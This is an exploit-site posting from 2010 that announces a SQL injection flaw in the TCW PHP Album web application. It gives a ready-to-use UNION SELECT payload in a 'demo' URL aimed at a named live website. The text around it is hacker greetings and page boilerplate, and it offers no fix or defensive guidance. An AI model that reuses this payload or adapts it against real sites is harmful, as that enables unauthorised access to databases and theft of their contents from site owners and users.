Home / os / winmobile

TCW PHP Album SQL injection Vulnerabilty

Posted on 06 July 2010

<!DOCTYPE HTML PUBLIC '-//W3C//DTD HTML 4.01 Transitional//EN'><html><head><meta http-equiv='Content-Type' content='text/html; charset=windows-1251'><title>TCW PHP Album SQL injection Vulnerabilty</title><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon'><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss'></head><body><pre>========================================
TCW PHP Album SQL injection Vulnerabilty 
========================================


Name : TCW PHP Album SQL iNjection Vulnerabilty
Critical Level :VERY HIGH
vendor URL :http://www.codango.com/php/fnc/goto/?id=7951410
Price:free

Author : ..::[ SONiC ]::.. aka ~the_pshyco~ &lt;sonicdefence[at]gmail.com&gt;

special thanks to : Sid3^effects,r0073r (inj3ct0r.com),L0rd CruSad3r,M4n0j,Bunny,Nishi,MA1201,RJ,D3aD F0x

greetz to :www.topsecure.net ,All ICW members , iNj3cT0r.com, www.andhrahackers.com

special Shoutz : my Girl Frnd [H*****]

#######################################################################################################
Description :


TCW PHP Album is a set of PHP scripts that (using MySQL and the GD Library) allow you to easily make online multimedia albums. With an intuitive administrative panel you can quickly add albums, photos, themes, and change site settings.


#######################################################################################################
Xploit :SQl i vulnerabilty

DEMO URL http://www.tcwonline.org/~greentryst/photos/index.php?album=-3%20union%20all%20select%207,6,5,4,3,2,1--


###############################################################################################################

# ..::[ SONiC ]::.. aka the_pshyco
# profile http://inj3ct0r.com/author/2545



# <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-07-06]</pre><script type='text/javascript'>var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type='text/javascript'>try{var pageTracker = _gat._getTracker("UA-12725838-1");pageTracker._setDomainName("none");pageTracker._setAllowLinker(true);pageTracker._trackPageview();}catch(err){}</script></body></html>

 

TOP

Malware :

Exploits :